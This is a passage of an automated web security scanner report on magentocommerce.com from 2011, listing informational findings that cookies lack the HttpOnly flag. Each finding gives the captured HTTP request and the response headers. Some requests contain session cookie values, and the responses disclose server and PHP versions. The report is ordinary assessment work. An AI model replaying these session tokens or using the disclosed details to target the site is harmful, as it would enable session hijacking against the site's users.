Last-Modified: Fri, 12 Aug 2011 15:02:12 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.136. http://www.magentocommerce.com/services/contact-us-popup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/contact-us-popup

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/contact-us-popup HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175780; expires=Sat, 11-Aug-2012 15:03:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fcontact-us-popup%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:00 GMT
Content-Length: 3090

<div class="contact-popup-top">
<div class="top-l-corner"></div>
<div class="top-r-corner"></div>
</div>
<a class="popup-close" onclick="contactBox.close();" href="#"><img src="http://www.mage
...[SNIP]...
4.137. http://www.magentocommerce.com/services/course-pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-pricing

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/course-pricing HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175747; expires=Sat, 11-Aug-2012 15:02:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fservices%2Fcourse-pricing%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:27 GMT
Content-Length: 35078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.138. http://www.magentocommerce.com/services/course-schedule  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-schedule

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/course-schedule HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175751; expires=Sat, 11-Aug-2012 15:02:31 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fservices%2Fcourse-schedule%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:31 GMT
Content-Length: 49762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.139. http://www.magentocommerce.com/services/descriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/descriptions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/descriptions HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/training
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170926; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.6.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171049; expires=Sat, 11-Aug-2012 13:44:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:09 GMT
Content-Length: 57276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.140. http://www.magentocommerce.com/services/professional-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/professional-services

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/professional-services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175764; expires=Sat, 11-Aug-2012 15:02:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fprofessional-services%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:45 GMT
Content-Length: 35091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.141. http://www.magentocommerce.com/services/register-for-training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/register-for-training

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/register-for-training HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fregister-for-training%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:13 GMT
Content-Length: 41049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.142. http://www.magentocommerce.com/services/testimonials  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/testimonials

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/testimonials HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175741; expires=Sat, 11-Aug-2012 15:02:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Ftestimonials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:21 GMT
Content-Length: 36222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.143. http://www.magentocommerce.com/services/thank-you  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/thank-you

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/thank-you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175752; expires=Sat, 11-Aug-2012 15:02:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fservices%2Fthank-you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:32 GMT
Content-Length: 730

<div class="contact-popup-top">
<div class="top-l-corner"></div>
<div class="top-r-corner"></div>
</div>
<a class="popup-close" onclick="contactBox.close();" href="#"><img src="http://www.mage
...[SNIP]...
4.144. http://www.magentocommerce.com/services/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/training

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/training HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.5.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171066; expires=Sat, 11-Aug-2012 13:44:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:26 GMT
Content-Length: 37516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.145. http://www.magentocommerce.com/showcase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /showcase

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showcase HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176322; expires=Sat, 11-Aug-2012 15:12:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fshowcase%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:02 GMT
Content-Length: 50996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.146. http://www.magentocommerce.com/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /sitemap/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitemap/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176452; expires=Sat, 11-Aug-2012 15:14:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:12 GMT
Content-Length: 55319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.147. http://www.magentocommerce.com/support/magento-user-guide-book  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento-user-guide-book

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/magento-user-guide-book HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176223; expires=Sat, 11-Aug-2012 15:10:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fsupport%2Fmagento-user-guide-book%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:23 GMT
Content-Length: 39756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.148. http://www.magentocommerce.com/support/magento_core_api  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento_core_api

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/magento_core_api HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176236; expires=Sat, 11-Aug-2012 15:10:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fsupport%2Fmagento_core_api%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:36 GMT
Content-Length: 34959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.149. http://www.magentocommerce.com/support/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/overview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/overview HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176215; expires=Sat, 11-Aug-2012 15:10:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fsupport%2Foverview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:16 GMT
Content-Length: 37099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.150. http://www.magentocommerce.com/svn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /svn

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /svn HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
